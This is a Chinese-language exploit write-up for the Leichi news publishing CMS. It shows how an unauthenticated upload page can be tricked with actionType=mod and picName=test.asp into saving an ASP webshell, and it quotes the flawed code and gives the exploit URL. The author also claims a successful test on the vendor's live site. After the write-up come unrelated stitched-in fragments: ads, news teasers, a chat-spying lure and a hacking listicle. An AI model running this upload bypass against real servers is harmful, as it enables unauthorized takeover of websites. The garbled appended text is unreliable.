声明:漏洞为focn[BCT]首先发现,版权归漏洞发现者focn所有,转载请保持文章完整,并注明出处!本文章只做学习研究用,任何人用于其他非法用途本人不承担任何责任! 作者:黑萝卜系统: 雷驰新闻发布管理系统版本: 当前任何版本漏洞描述:1 在admin文件夹下的uploadPic.inc.asp中,没有对访问权限进行限制,任意用户都可 以 访问到此文件。任意用户都可以使用此文件上传文件到服务器 2 uploadPic.inc.asp中虽然对上传文件的后缀名进行了限制但是可以绕过。请看代码! if file.FileSize>0 then ''如果 FileSize > 0 说明有文件数据 '生成图片名字 if actionType= "mod" then remFileName = Right(picName,len(picName)-InstrRev(picName,"/")) else if editRemNum<>"" then remNum = editRemNum else Randomize remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time) end if remFileName = remNum&"_"&(editImageNum+1)&".gif" end if file.SaveAs Server.mappath(formPath&remFileName) ''保存文件 %> 关键的是 if actionType= "mod" then remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))只要自己构造actionType= "mod" 就可以饶过下面的文件名检测上传ASP文件构造如下UPLhttp://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp然后在上传文件里面填要传的图片格式的ASP木马就可以在uppic目录下上传文件名为test.asp的文件 本 *** 在雷驰官方网站上测试通过!·再次希望大家不要用于非法用途!!
? 高端休闲会所,此时此刻的你是不是也在等待属于你的爱情?不要迷茫也不要彷徨,请相信,缘分总有一天会光顾你的世界。,昨宵北窗下,水底新月明。料得明朝,樽前重见,镜里花难折。也应惊问,近来多少华发?,梨...
这是一场老刘和老董的战争。 文 | 史中(微信:Fungungun)雷锋网主笔 (一)高墙,硬盘和锤子 地点:河北邢台 人物:老董 老董坐在河北邢台的家里,匆匆吃着早饭。 他身边的电脑指示...
9月6日,河南驻马店,“错换人生28年”案件开庭在即,患癌姚先生出现肺转移和骨转移倾向。母亲杜女士称,只要两个孩子愿意,愿意换回来,由自己照顾生病儿子,也愿意让养子回到亲生父母身边,得到更好的发展。...
安卓版微信的聊天记录怎么导出保存查看怎么查看对方正在聊天的微信聊天记录今天我们聊的话题是 ,“有限公司股份公司,你分得清吗? ”那我们先说什么是有限公司?什么是股份公司,下面我举个例子: 1、有...
现如今人们的生活条件越来越好,在平时的生活中也是非常的喜欢寻找各种各样的小吃来吃的,虽然说我们都知道现在的食品安全问题是比较重视的,可是有的人就觉得虽然这些小事可能确实是不太卫生,可是吃起来味道还是不...
本文目录一览: 1、怎样当黑客? 2、我想当一名黑客现在零基础,首先我该做什么呢 3、黑客零基础入门 怎样当黑客? 可以说想学黑客技术,要求你首先是一个“T”字型人才,也就是说电脑的所有领域...